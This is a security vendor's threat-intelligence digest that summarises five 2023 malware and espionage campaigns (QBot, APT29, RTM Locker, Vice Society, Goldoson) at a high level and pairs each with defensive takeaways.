QBot Banker Delivered through Business Correspondence
Background:
In early April 2023, an increased volume of malspam utilizing business-email thread hijacking was detected delivering the QBot (QakBot, QuackBot, Pinkslipbot) banking trojan. The observed lures in English, German, Italian, and French were targeting various countries with the top three being Germany, Argentina, and Italy, in that order. The attackers were spoofing a name in the hijacked conversation to prompt the target to open an attached PDF file. The target is then faced with a button, a password, and an instruction to download, unpack and execute a malicious Windows Script File (WSF) within a password-protected archive. User execution is followed by automated deobfuscation of a contained JScript producing an encoded PowerShell script aimed at downloading a QBot DLL from a compromised website and running it with the help of rundll32. QBot steals credentials, profiles systems to identify prospects for additional high-value targeting, and steals locally-stored emails for further proliferation via thread hijacking malspam.
Takeaway:
The spoofing of the sender’s name from the previous letters in the ‘From’ field can be identified in this campaign because it uses a sender’s fraudulent email address different from that of the real correspondent. Users should be cautious with password-protected archives and suspicious file types such as WSF.
Espionage Campaign Linked to Russian Intelligence Services
Background:
A new cyberespionage campaign attributed to Russia-sponsored group Cozy Bear (APT29, Nobelium) has been targeting NATO and European Union member countries, and to a lesser extent, Africa. An embassy-themed spearphishing link leads to a compromised website with a custom EnvyScout script utilizing the HTML Smuggling technique. Three new downloaders were unique to this campaign: SnowyAmber, used since October 2022, QuarterRig, used since March 2023, and HalfRig, used since February 2023. The final observed payload was an attack framework beacon, either Cobalt Strike or Brute Ratel.
Takeaway:
Many advanced attacks start with a spearphishing email. It is important to teach your users basic online hygiene and phishing awareness.
Learn about our Penetration Testing Services
Read The Manual Locker: A Private RaaS Provider
Background:
The Read The Manual (RTM) Locker group is a new ransomware-as-a-service (RaaS) provider with likely connections to the Commonwealth of Independent States. The group operates Windows-targeting ransomware with a focus on double-extortion attacks on corporate environments. The RTM Locker malware requires an affiliate to provide administrative privileges in the compromised network. To increase the effect of encryption, the locker tries to mount all unmounted partitions to unused drives until all 26 drive letters are in use. RTM Locker uses Input/Output Completion Ports to enable multiple threads to work with the same file at the same time. The RTM Locker group avoids direct spreading via malspam, marks its builds to discourage premature leaks, clears the logs and removes the locker after the system is encrypted. Additionally, the group employs strict rules for its affiliates to adhere to targeting rules and be removed for unexcused inactivity of over 10 days.
Takeaway:
Multi-threading allows RTM Locker for fast encryption. Ransomware is a constantly evolving threat, and the most fundamental defense is having proper backup and restore processes in place that allows recovery without any need to decrypt the affected data. Data theft is containable through segmentation, encrypting data at rest, and limiting the storage of personal and sensitive data.
Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land
Background:
A new PowerShell data exfiltration script was detected in use by the Vice Society ransomware group. The attackers get access to the target’s Domain Controller, which allows them to deploy this script to any endpoint within the network. It is started with the parameter to bypass Execution Policy restrictions and starts by identifying mounted drives on the system via Windows Management Instrumentation. The script proceeds to automatically identify and process directory names for all directories on each mounted volume that do not match the ignore list. It then uses additional keywords and parameters to select which directories and files to pass to exfiltrate via HTTP POST requests to the threat actor’s web server. The script implements rate limiting to avoid overwhelming the host’s resources.
Takeaway:
The use of the living off the land binaries and scripts (LOLBAS) methods, such as PowerShell scripts and WMI creates difficulties for detection. Network defenders can check Windows Event Logs (WEL) Event IDs 400, 600, 800, 4103 and 4104. Monitor for HTTP POST events to /upload endpoints on unknown remote HTTP servers, and HTTP activity direct to external IP addresses. Use Palo Alto Networks YARA signature to detect this malicious PowerShell exfiltration activity.
Goldoson: Privacy-Invasive and Clicker Android Adware Found in Popular Apps in South Korea
Background:
A malicious Android library dubbed Goldoson has been found targeting predominantly South Korean users. McAfee researchers detected it in applications downloaded more than 100 million times from Google Play, and 8 million from the ONE store, an app store popular in South Korea. Goldoson collects information about users’ locations, connection history, and installed applications. The library either gets the permissions from the app or specifically asks the user to allow the location permission. Additionally, Goldoson produces hidden fraudulent traffic by loading HTML code and injecting it into a customized and hidden WebView and visiting the URLs recursively.
Takeaway:
All the identified affected applications were either updated or removed from the official stores. Users are advised to regularly review the list of installed applications to remove those that are no longer needed. Pay attention to signs of malicious resource utilizations such as device overheating and faster battery drain. Do not grant unnecessarily permissions such as location permission unless you know it is needed for the application to produce desired functionality.
Learn about our Penetration Testing Services
Subscribe So You Never Miss an Update
